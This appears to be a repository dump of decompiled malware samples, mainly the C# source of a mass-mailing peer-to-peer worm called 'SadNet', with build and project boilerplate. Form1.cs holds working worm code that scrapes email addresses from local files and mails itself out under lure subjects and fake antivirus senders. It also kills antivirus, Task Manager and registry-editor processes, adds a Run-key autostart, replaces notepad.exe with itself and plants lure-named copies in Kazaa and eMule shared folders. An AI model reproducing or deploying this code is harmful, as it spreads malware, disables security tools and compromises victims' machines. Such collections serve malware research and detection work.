<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>WindowsApplication1</AssemblyName>
<ApplicationVersion>1.0.1397.42263</ApplicationVersion>
<RootNamespace>WindowsApplication1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/P2P-Worm.Win32.Secorm.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WindowsApplication1", "P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6.csproj", "{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Debug|Any CPU.Build.0 = Debug|Any CPU
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Release|Any CPU.ActiveCfg = Release|Any CPU
{B7BD5C1B-AFB6-43C6-8F63-7FD475FCB6C1}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyProduct("SadNet")]
[assembly: AssemblyCompany("civil")]
[assembly: Guid("9bf87720-9855-4a4e-9e7e-e3e5ea68a686")]
[assembly: AssemblyCopyright("Copyright © civil 2006")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("SadNet")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Form1.cs
+348
View File
@@ -0,0 +1,348 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Form1
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Mail;
using System.Windows.Forms;
namespace SadNet
{
public class Form1 : Form
{
private IContainer components;
private Timer mailer;
private Timer killer;
public Form1() => this.InitializeComponent();
private void mailer_Tick(object sender, EventArgs e)
{
try
{
string str1 = new string[20]
{
"mcafee",
"symantec",
"Yahoo!",
"Thank you!",
"Text message",
"Document",
"Incoming Message ",
"Message Notify ",
"Fax Message",
"Protected message",
"panda",
"Encrypted document",
"Account notify",
"E-mail account disabling warning",
"E-mail technical support message.",
"E-mail warning",
"Email account utilization warning.",
"Fax Message Received ",
"Forum notify ",
"do you know AmirCivil?"
}[new Random().Next(0, 20)];
string str2 = new string[5]
{
"AmirCivil.pic.cmd",
"register.pif ",
"sexy-screensaver.scr ",
"fullmessenger.exe",
"readme.html.cmd"
}[new Random().Next(0, 5)];
string str3 = new string[20]
{
"Deliver Error",
"Message Error",
"help attached ",
"such as yours",
"illegal st. of you?",
"is that your name? ",
"picture? ",
"abuse? ",
"is that yours? ",
"I have your password! ",
"classroom test of you? ",
"old photos about you? ",
"i hope thats not true! ",
"does it match? ",
" you know amir_civil?!",
"why should I? ",
"another pic, have fun! ... :->",
"xxx ? ",
"the information is wrong! ",
"love letter? "
}[new Random().Next(0, 20)];
string searchPattern = new string[2]
{
"*txt",
"*html"
}[new Random().Next(0, 2)];
string str4 = new string[20]
{
"mcafee@yahoo.com",
"symantec@yahoo.com",
"nod32@yahoo.com",
"panda@yahoo.com",
"avg@yahoo.com",
"antiblaster@yahoo.com",
"info@yahoo.com",
"ebook@yahoo.com",
"LongShot@yahoo.com",
"iraq@yahoo.com",
"update@yahoo.com",
"matt@yahoo.com",
"steve@yahoo.com",
"smith@yahoo.com",
"stan@yahoo.com",
"bill@yahoo.com",
"bob@yahoo.com",
"YourFriend@yahoo.com",
" mail@yahoo.com",
"ted@yahoo.com"
}[new Random().Next(0, 20)];
string path = new string[5]
{
"C:\\",
"D:\\",
"E:\\",
"G:\\",
"F:\\"
}[new Random().Next(0, 5)];
for (int index = 0; index < 10; ++index)
{
try
{
string[] strArray = new string[3]
{
"C:\\dir1",
"D:\\",
"C:\\windows"
};
foreach (string str5 in strArray)
{
foreach (string file in Directory.GetFiles(path, searchPattern))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
{
string str6 = match.ToString();
try
{
MailMessage message = new MailMessage();
message.From = str4;
message.To = str6;
message.Cc = "info@yahoo.com";
message.Bcc = "password@yahoo.com";
message.Subject = str1;
message.Body = str3;
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
SmtpMail.Send(message);
}
catch (Exception ex)
{
}
}
}
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
private void killer_Tick(object sender, EventArgs e)
{
string[] strArray = new string[56]
{
"NPROTECTED",
"GhostTray",
"NAVW32",
"F-AGNT95",
"NOD32",
"NETD32",
"NETMON",
"IOMON98",
"SCAN32",
"NORMIST",
"NAVW3",
"ADAWARE",
"AGENTW",
"LU32",
"NAVAP32",
"ANTIVIR",
"TCM",
"W9X",
"AVKSERV",
"winamp",
"ACKWIN32",
"AD-AWARE",
"ADVXDWIN",
"AGENTSVR",
"AGENTW",
"ANTIVIRUS",
"ANTS",
"APIMONITOR",
"APLICA32",
"ARR",
"AUPDATE",
"AUTODOWN",
"AUTOTRACE",
"AVE32",
"AVGCC32",
"AVGCTRL",
"AVGNT",
"CFINET",
"CLEANPC",
"CTRL",
"AV32",
"DATEMANAGER ",
"DOORS",
"DPFSETUP ",
"FCH32 ",
"FNRB32",
"notepad",
"killer",
"POP3TRAP",
"remind",
"cftmon",
"msmsgs",
"taskmgr",
"regedit",
"vb6",
"ZONEALARM"
};
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 56)]))
process.CloseMainWindow();
}
private void hidden_Tick(object sender, EventArgs e)
{
}
private void error_Tick(object sender, EventArgs e)
{
}
private void copy_Tick(object sender, EventArgs e)
{
}
private void amir(object sender, EventArgs e)
{
this.Hide();
try
{
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\winlogon.cab.exe");
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet", (object) (Environment.SystemDirectory + "\\winlogon.cab.exe"), RegistryValueKind.ExpandString);
Registry.SetValue("HKEY_CURRENT_USER\\SadNet", "SadNet", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
}
catch (Exception ex)
{
}
try
{
File.Move(Environment.SystemDirectory + "\\notepad.exe", Environment.SystemDirectory + "\\AmirCivil.exe");
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\notepad.exe");
}
catch (Exception ex)
{
}
try
{
File.Copy(Application.ExecutablePath, "C:\\symantec.exe");
File.Copy(Application.ExecutablePath, "D:\\fun.pic.scr");
File.Copy(Application.ExecutablePath, "E:\\wow.pif");
File.Copy(Application.ExecutablePath, "F:\\mail.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
}
catch (Exception ex)
{
}
try
{
api.ShowWindow(api.FindWindow("ConsoleWindowClass", (string) null), 0);
api.ShowWindow(api.FindWindow("#32770", (string) null), 0);
api.ShowWindow(api.FindWindow("MGHTML_DLG_CLASS", (string) null), 0);
api.ShowWindow(api.FindWindow("NAVAP Wnd Clas", (string) null), 0);
api.ShowWindow(api.FindWindow("RegEdit_RegEdit", (string) null), 0);
api.ShowWindow(api.FindWindow("notepad", (string) null), 0);
}
catch (Exception ex)
{
}
}
private void hien_Tick(object sender, EventArgs e)
{
}
private void mail2_Tick(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.mailer = new Timer(this.components);
this.killer = new Timer(this.components);
this.SuspendLayout();
this.mailer.Enabled = true;
this.mailer.Interval = 30000;
this.mailer.Tick += new EventHandler(this.mailer_Tick);
this.killer.Enabled = true;
this.killer.Tick += new EventHandler(this.killer_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = "SadNet";
this.Activated += new EventHandler(this.amir);
this.ResumeLayout(false);
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/P2P-Worm.Win32.Small.v.csproj
+51
View File
@@ -0,0 +1,51 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{30C159C8-88B4-48DC-906F-93905CF0199E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>SadNet</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>SadNet</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="api.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/P2P-Worm.Win32.Small.v.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SadNet", "P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.csproj", "{30C159C8-88B4-48DC-906F-93905CF0199E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{30C159C8-88B4-48DC-906F-93905CF0199E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{30C159C8-88B4-48DC-906F-93905CF0199E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{30C159C8-88B4-48DC-906F-93905CF0199E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{30C159C8-88B4-48DC-906F-93905CF0199E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Program.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Program
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System;
using System.Windows.Forms;
namespace SadNet
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Properties.Resources
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace SadNet.Properties
{
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (SadNet.Properties.Resources.resourceMan == null)
SadNet.Properties.Resources.resourceMan = new ResourceManager("SadNet.Properties.Resources", typeof (SadNet.Properties.Resources).Assembly);
return SadNet.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => SadNet.Properties.Resources.resourceCulture;
set => SadNet.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Properties.Settings
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace SadNet.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
